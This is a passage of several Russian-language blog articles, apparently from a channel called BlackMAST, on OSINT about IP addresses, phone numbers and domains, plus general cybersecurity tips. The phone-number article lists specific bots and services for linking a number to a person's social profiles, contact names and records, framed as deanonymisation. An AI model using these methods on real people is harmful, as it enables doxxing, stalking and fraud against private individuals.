2. Защитите личную информацию. При проведении OSINT-расследований IP-адресов будьте осторожны, чтобы не раскрыть свою личность. Используйте VPN или другое безопасное соединение, чтобы защитить свою информацию. Не используйте личные учетные записи — например, электронную почту или профили в социальных сетях для расследования.
3. Проверьте свои источники. Дважды проверьте информацию, которую вы собираете с IP-адресов, чтобы убедиться, что она точна и надежна. Используйте несколько источников для подтверждения своих выводов и не полагайтесь только на один источник информации.

Заключение

OSINT IP-адреса — это мощный инструмент для расследования киберпреступлений и борьбы с ними. Собирая информацию об IP-адресах, эксперты могут выявлять потенциальных участников угроз, отслеживать киберпреступнико​

 

[BlackMAST]

Что твой номер телефона расскажет о тебе?— OSINT

Что твой номер телефона расскажет о тебе?— OSINT

Вступить в наш чат
​

Современные реалии таковы, что телефонные номера стали неотъемлемой частью повседневной жизни. Пользователи указывают свои номера в социальных сетях, на сайтах объявлений и в различных интернет-магазинах, но они не подозревают, что делают себя легкой добычей для хакеров и мошенников. OSINT по номеру телефона становится все более популярным методом сбора ценной информации о человеке. Вы не ослышались, всего лишь 11 цифр телефона могут быть использованы для деанона пользователя. В этой статье мы рассмотрим различные методы и инструменты, используемые для OSINT по номеру телефона.

Что может рассказать номер телефона
​

Одним из первых шагов в проведении OSINT по номеру телефона является сбор информации о самом телефоне. Это может включать определение оператора связи, местоположения и модель телефона. Для сбора этой информации можно использовать онлайн-сервисы. С их помощью вы можете получить важную информацию о привычках человека, например, о том, где он живет и работает.

Номера телефонов также можно использовать для поиска профилей в социальных сетях. Так, в Facebook, Instagram и ВК можно быстро найти учетную запись человека, включив поиск по контактам (предварительно нужно занести номер в свой телефон). Как только учетная запись будет идентифицирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.

Номера телефонов также можно использовать для поиска в общедоступных базах данных. Например, использовать номер телефона для поиска судебных записей, ИП и других документов. Все это может дать ценную информацию о судимости человека, финансовом положении и других аспектах его личной и профессиональной жизни.
Инструменты OSINT

Существует множество способов пробива по номеру телефона. Вот некоторые инструменты, которые можно использовать для OSINT по номеру телефона:

1. Truecaller

2. Microsoft поз*воля*ет про*верять при*вяз*ку номера к акка*унту на сай*те account.live.com.

3. @bmi_np_bot — по номеру телефона определяет регион и оператора, включая новые номера.

4. @getfb_bot — выдает привязанную к номеру телефона страницу в Facebook.

5. @get_kontakt_bot — найдет как записан номер в контактах, имеет большую базу контактов.

6. nuga.app — поиск страницы Instagram по номеру. При первом сканировании найденная страница предоставляется сразу, но при последующих поисках нужно будет подписаться на соцсети создателей.

7. pipl.com — полезный ресурс для поиска человека по номеру телефона в самых популярных соц. сетях. Несмотря на то что сайт платный, есть пробный период.

Заключение
​

OSINT телефонного номера — это действенный способ деанона человека. Используя комбинацию инструментов и методов, разведчики могут раскрыть огромное количество информации о личной и профессиональной жизни пользователя. Будьте предельно внимательны и не указывайте информацию в социальных сетях, которая поможет вас идентифицировать. Не облегчайте сбор информации мошенниками и различным сборщикам телефонных баз.

 

[BlackMAST]

OSINT домена. Собираем информацию о сайте

OSINT домена. Собираем информацию о сайте

Вступить в наш чат
​

В эпоху роста цифровых технологий нельзя недооценивать киберпреступность, которая уже стала серьезной угрозой как для отдельных лиц, так для предприятий и даже правительства. Как правило, любая хакерская атака начинается с поиска информации о цели, а некоторые атаки на этом этапе и заканчиваются. В этом цифровом хаосе важно обезопасить себя, и в случае чего первым нанести удар. Однако, для этого необходимо обладать знаниями и инструментами для поиска из открытых источников.

Сегодня мы рассмотрим такое понятие, как OSINT доменного имени, а также различные инструменты и методы, которые могут использоваться для сбора информации о сайте.

Что такое домен
​

Прежде чем углубиться в OSINT домена, важно иметь общее представление о том, что значит доменное имя.
Доменное имя — это адрес, который пользователи вводят в адресной строке браузера для доступа к сайту или, проще говоря, это адрес сайта в Интернете. Например, доменное имя Google — «google.com».

Доменные имена состоят из двух частей: домен верхнего уровня (TLD) и домен второго уровня (SLD). TLD — это часть доменного имени, которая стоит после последней точки, например «.ru», «.com» или «.net». SLD — это часть доменного имени, которая стоит перед TLD, например, «google» в приведенном выше примере.

В дополнение к TLD и SLD доменные имена также могут содержать поддомены, которые представляют собой дополнительные разделы, предшествующие SLD. Например, «mail.google.com» является субдоменом «google.com». Субдомены часто используются для сортировки разделов сайта или для создания иерархии контента.

OSINT домена
​

OSINT домена — это процесс сбора и анализа информации из открытых источников о конкретном домене (сайте). Домен OSINT может использоваться для сбора ценной информации о возможных атаках, уязвимостях и угрозах, нацеленных на какую-то организацию.

Инструменты для домена OSINT
​

Теперь, когда мы ознакомились с основами доменных имен, давайте рассмотрим различные инструменты для проведения OSINT-разведок.

WHOIS.net и DomainTools

​

Инструменты, позволяющий искать информацию о доменном имени, включая регистрационные данные и контактную информацию владельца домена.

DomainTools, SecurityTrails и DomainTools Iris
​

Инструменты истории домена, которые позволяют отслеживать изменения прав собственности и истории домена, включая изменения в записях DNS, IP-адресах и SSL-сертификатах.

SSLShopper и SSL Labs
​

Инструменты поиска SSL-сертификатов. С помощью этих инструментов можно искать сертификаты SSL, связанные с определенным доменным именем. SSL-сертификаты могут предоставить ценную информацию о владельце веб-сайта и помочь выявить вредоносную активность.

ViewDNS, Nslookup и DNSstuff
​

Инструменты поиска DNS могут запрашивать систему доменных имен (DNS) для получения информации об IP-адресе доменного имени, почтовых серверах и другой информации.

Каждый из этих инструментов имеет свои сильные и слабые стороны, и для успешной разведки вам потребуется использовать комбинацию этих инструментов для сбора всех необходимых данных.

Советы по проведению OSINT домена
​

Теперь, когда мы знаем об инструментах для OSINT-расследований, давайте посмотрим, как выжить максимум из разведки и предостеречь себя от опасности. Ниже приведены рекомендации, о которых следует помнить:

Используйте надежные инструменты: при проведении OSINT-расследований домена важно использовать безопасные инструменты, которые защищают ваши данные и личную информацию.
Защитите свои данные: будьте осторожны, когда проводите OSINT разведку, чтобы не раскрыть свою личную информацию. Используйте псевдонимы и избегайте использования личного адреса электронной почты или номера телефона.
Используйте несколько источников: не полагайтесь исключительно на один инструмент или базу данных. Важно использовать несколько источников информации.
Оставайтесь в курсе новостей: киберпреступники постоянно совершенствуют свои тактики, поэтому важно быть в курсе последних событий, новейших тенденций и технологий.

Заключение
​

В заключение хотелось бы отметить, что OSINT домена является одним из самых важных способов получения данных о конкретном сайте. Собирая информацию о доменных именах, вы можете выявлять источник угроз, отслеживать киберпреступников и собирать данные о конкурентах. Для проведения эффективных и безопасных OSINT-расследований важно следовать передовым методам и использовать безопасные инструменты, о которых мы вам и рассказываем. На этом все. Удачи!

 

[BlackMAST]

Кибербезопасность: что грозит вашему компьютеру

Кибербезопасность: что грозит вашему компьютеру

Вступить в наш чат
​

За последние пару лет значительно возросло напряжение в киберпространстве, в том числе за счёт роста рынка киберпреступности. Только за 2022 год количество инцидентов стало больше на 21%. Согласно мнению экспертов, объем и сложность атак с каждым годом увеличиваются в геометрической прогрессии.

Знание того, как идентифицировать компьютерные угрозы является первым шагом на пути к вашей безопасности. В этой статье мы познакомим вас с распространенными киберугрозами и с тем, как вы можете защититься от них.

Что такое киберугроза
​

Киберугроза - угроза незаконного проникновения в виртуальном пространстве с целью хищения ценных данных. Киберугроза может привести к:

Потере или повреждению системных данных;
Незаконному мониторингу ваших действий в Сети;
Краже конфиденциальной информации.

Виды киберугроз
​

Ниже представлен список распространенных киберугроз:

Вирус;
Троян;
Червь;
Шпионское ПО;
Кейлоггер;
Рекламное ПО;
Атака «отказ в обслуживании» (DoS);
Фишинг.

Советы по кибербезопасности
​

Чтобы защитить компьютерные системы от вышеупомянутых угроз, важно комплексно подходить к этой проблеме. Используя все нижеуказанные меры безопасности, можно предотвратить, либо существенно снизить риск кибератаки.

1 Настройте двухфакторную аутентификацию. Двухфакторная аутентификация создает дополнительный уровень безопасности для защиты данных. Злоумышленнику будет недостаточно знать данные для входа — ему также потребуется ваш телефон или другая информация.
2 Используйте VPN. Каждый раз, когда вы подключаетесь к Сети через обычное соединение вы рискуете своей безопасностью. А если вы используете общедоступные Wi-Fi-соединения, например, в кофейне или коворкинге, то вы рискуете вдвойне. Такие соединения незащищены, и это означает, что трафик, идущий к устройствам, может быть перехвачен хакерами. Чтобы обезопасить свою личную информацию, важно использовать виртуальную частную сеть (VPN). Она зашифрует весь интернет-трафик и даст гарантию, что любые данные будут защищены от киберпреступников.
3 Грамотное управление паролями. Использование одних и тех же неизменных паролей – серьезный промах в вашей безопасности. Необходимо устанавливать уникальный, а главное сложный пароль для каждой учетной записи.
4 Не пренебрегайте качественным антивирусом. Для защиты от вирусов, троянов, червей и т.п. нужно использовать антивирусное программное обеспечение.
5 Регулярное обновление ОС и ПО. Причина, по которой операционные системы и программное обеспечение регулярно обновляются разработчиками, заключается в том, что они вносят исправления ошибок и создают новые патчи, способные защитить любые обнаруженные уязвимости. Не обновляя операционную систему и программное обеспечение по мере необходимости, вы оставляете бреши в системе безопасности.
6 Выполните тестирование на проникновение. Существует ряд инструментов для проверки ваших устройств на наличие уязвимостей. Проанализируйте результаты и внесите необходимые улучшения, чтобы сделать их более безопасными.
7 Делайте резервное копирование (бэкап). Это спасет от вирусов-вымогателей, которые удаляют ваши данные с ПК, а затем хакеры требует за них выкуп. С бэкапом вы всегда сможете быть уверенным, что ваши данные не пропадут бесследно.

Заключение
​

Обеспечение кибербезопасности — это непрерывный процесс, который нельзя прекращать ни на одну минуту и который требует постоянной вовлеченности на всех уровнях. Для защиты своих данных важно применять все необходимые действия, начиная с регулярного обновления ПО и заканчивая установкой надежного пароля. Поскольку число и сложность кибеугроз постоянно увеличивается, советуем оставаться в курсе новостей, следя за нашими статьями. На этом все. Удачи!